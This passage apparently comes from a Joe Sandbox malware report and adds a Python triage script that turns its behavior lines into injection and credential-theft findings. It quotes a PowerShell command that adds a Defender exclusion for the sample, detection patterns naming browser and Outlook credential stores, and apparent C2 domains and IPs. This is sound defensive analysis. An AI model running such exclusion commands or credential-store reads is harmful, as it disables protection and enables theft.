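                Added example, not part of the Joe Sandbox report: a small Python triage script that parses behavior lines in the format this report uses (the report prints the action keyword directly after the source path, with no separator, and appends an interactive "Jump to behavior" suffix) and turns the injection and direct-syscall evidence listed in the section above and the credential-store accesses listed in this section into findings. The lines embedded in it are copied from this page and labelled as constructed input; the rule names, the set of Windows binaries treated as living-off-the-land hosts and the decision to flag finger.exe by that route are this example's own choices, not a Joe Sandbox feature.

```python
"""Triage rules over Joe Sandbox-style behavior lines.

Added example, not part of the Joe Sandbox report. SAMPLE_LINES are constructed
from lines of this report (the interactive "Jump to behavior" suffix is left on
so the parser shows how to strip it); the rule names and the LOLBIN set are
this example's own choices, not a Joe Sandbox feature.
"""
import re
from collections import Counter, defaultdict

# The report prints the action keyword directly after the source path with no
# separator, so the parser keys on a fixed set of known action prefixes.
ACTIONS = ("Memory written:", "Process created:", "Section loaded:",
           "File opened:", "Key opened:", "Thread APC queued:",
           "Thread register set:")
ACTION_RE = re.compile(r"^Source: (?P<src>.+?\.exe)(?P<action>"
                       + "|".join(re.escape(a) for a in ACTIONS)
                       + r")\s*(?P<detail>.*)$")
SYSCALL_RE = re.compile(r"^Source: (?P<src>.+?\.exe)(?P<api>Nt\w+): Direct from: "
                        r"(?P<addr>0x[0-9A-Fa-f]+)$")
EXCLUSION_RE = re.compile(r'-ExclusionPath\s+"?([^"]+)"?', re.IGNORECASE)
BROWSER_STORES = ("Login Data", "Cookies", "Web Data", "Local State")
OUTLOOK_KEY = r"Windows Messaging Subsystem\Profiles\Outlook"
# Windows binaries with no legitimate reason to read credential stores
# (assumed list for this example).
LOLBINS = {"finger.exe", "regsvcs.exe", "regasm.exe", "msbuild.exe"}


def image(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse(line):
    """Split one report line into (source, action, detail); None if unrecognised."""
    line = line.strip().removesuffix("Jump to behavior")
    m = SYSCALL_RE.match(line)
    if m:
        return m["src"], "Direct syscall", f'{m["api"]} {m["addr"]}'
    m = ACTION_RE.match(line)
    if m:
        return m["src"], m["action"].rstrip(":"), m["detail"].strip()
    return None


def triage(lines):
    """Return sorted (rule, actor, object) findings derived from the lines."""
    findings = set()
    syscalls = Counter()
    stores = defaultdict(set)
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        src, action, detail = parsed
        actor = image(src)
        if action == "Direct syscall":
            syscalls[actor] += 1
        elif action == "Memory written" and "value starts with: 4D5A" in detail:
            # An MZ header written at another process's image base: PE injection.
            findings.add(("pe_written_to_foreign_process", actor,
                          image(detail.split(" base:")[0])))
        elif action == "Process created" and "add-mppreference" in detail.lower():
            m = EXCLUSION_RE.search(detail)
            findings.add(("defender_exclusion_added", actor, m.group(1) if m else detail))
        elif action == "Section loaded" and "execute and read and write" in detail:
            target = detail.split("target: ")[1].split(" protection:")[0]
            findings.add(("rwx_section_mapped", actor, image(target)))
        elif action in ("Thread APC queued", "Thread register set"):
            findings.add(("thread_hijack_primitive", actor, action))
        elif action == "File opened" and detail.endswith(BROWSER_STORES):
            stores[actor].add(detail.rsplit("\\", 1)[-1])
        elif action == "Key opened" and OUTLOOK_KEY in detail:
            stores[actor].add("Outlook profile")
    for actor, n in syscalls.items():
        findings.add(("direct_syscalls", actor, n))
    for actor, objects in stores.items():
        rule = "lolbin_reads_credential_stores" if actor in LOLBINS else "credential_store_access"
        for obj in objects:
            findings.add((rule, actor, obj))
    return sorted(findings, key=lambda f: (f[0], f[1], str(f[2])))


# Constructed input: lines copied from this report, suffix and all.
SAMPLE_LINES = [
    r"Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtAllocateVirtualMemory: Direct from: 0x77D63C9CJump to behavior",
    r"Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeNtWriteVirtualMemory: Direct from: 0x77D62E3CJump to behavior",
    r"Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior",
    r'Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe"Jump to behavior',
    r"Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior",
    r"Source: C:\Windows\SysWOW64\finger.exeThread APC queued: target process: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeJump to behavior",
    r"Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior",
    r"Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior",
    r"Source: C:\Users\user\Desktop\oss4CtI8oz.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior",
]

if __name__ == "__main__":
    for rule, actor, obj in triage(SAMPLE_LINES):
        print(f"{rule:32} {actor:24} {obj}")
```

                Run stand-alone it prints one finding per line; in practice the behavior lines of a whole report are fed to triage() instead of SAMPLE_LINES. The volume-information line is deliberately included to show that noise the rules do not cover is dropped by parse() rather than misattributed. The MZ write at base 400000 into RegSvcs.exe is the single strongest line on this page for the "Injects a PE file into a foreign processes" signature, and the finger.exe findings are what make the page's "Tries to harvest and steal browser information" and "Tries to steal Mail credentials" signatures concrete: a network utility has no reason to open Login Data or the Outlook profile key.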

                Remote Access Functionality

                Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.1067799190.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3337490870.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3336839914.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3337645809.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1066763202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3342147165.00000000049E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3339789952.0000000002C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1074125583.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK Matrix

                The matrix is listed per tactic column. Techniques the report marks as matched carry the number the report attaches to them in parentheses; the remaining entries are the unmatched cells of the matrix as shown.

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Privilege Escalation: Process Injection (612); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Defense Evasion: Masquerading (11); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (51); Process Injection (612); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (4); Software Packing (12); Timestomp (1); DLL Side-Loading (1)
                Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                Discovery: Security Software Discovery (131); Process Discovery (2); Virtualization/Sandbox Evasion (51); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (123); Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                Behavior Graph (ID 1634642, sample oss4CtI8oz.exe, start date 11/03/2025, architecture WINDOWS, score 100), rendered as a process tree:

                Top-level DNS/IP: www.lenzor.xyz; www.ethereumkeeper.xyz (Performs DNS queries to domains with low reputation); 17 other IPs or domains
                Top-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; 6 other signatures

                oss4CtI8oz.exe (started)
                    dropped: C:\Users\user\AppData\...\oss4CtI8oz.exe.log (ASCII)
                    signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                    RegSvcs.exe (started)
                        signatures: Maps a DLL or memory area into another process
                        DzuG1v7KGGzqI4w.exe (injected)
                            signatures: Found direct / indirect Syscall (likely to bypass EDR)
                            finger.exe (started)
                                signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                                DzuG1v7KGGzqI4w.exe (injected)
                                    DNS/IP: www.xiongding.tech 111.119.219.195, ports 50257, 50258, 50259, SIPL-ASSysconInfowayPvtLtdIN India; www.lifce.life 209.74.77.230, ports 50241, 50242, 50243, MULTIBAND-NEWHOPEUS United States; 8 other IPs or domains
                                    signatures: Found direct / indirect Syscall (likely to bypass EDR)
                                firefox.exe (started)
                    powershell.exe (started)
                        signatures: Loading BitLocker PowerShell Module
                        WmiPrvSE.exe (started)
                        conhost.exe (started)
                svchost.exe (started)
                    DNS/IP: 127.0.0.1 unknown unknown
